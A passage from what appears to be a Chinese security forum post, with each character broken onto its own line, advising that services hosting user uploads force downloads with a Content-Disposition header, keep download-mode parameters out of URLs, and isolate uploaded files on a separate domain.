的
需
要
,
难
以
全
部
进
行
验
证
。
强
制
设
置
C
o
n
t
e
n
t
-
D
i
s
p
o
s
i
t
i
o
n
响
应
头
:
设
置
该
头
部
后
能
够
强
制
浏
览
器
对
文
件
执
行
下
载
操
作
。
但
是
对
国
内
一
些
服
务
测
试
的
过
程
中
也
发
现
了
一
个
问
题
,
有
些
直
接
在
U
R
L
中
加
了
类
似
d
o
w
n
l
o
a
d
t
y
p
e
=
1
这
类
参
数
,
直
接
设
置
成
0
就
不
会
强
制
下
载
了
。
所
以
建
议
这
种
参
数
不
要
暴
露
在
u
r
l
中
。
进
行
域
隔
离
:
这
个
没
什
么
说
的
,
尤
其
对
于
一
些
云
盘
,
云
存
储
的
服
务
,
对
于
用
户
上
传
的
文
件
不
做
域
隔
离
的
都
是
耍
流
氓
的
行
为
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞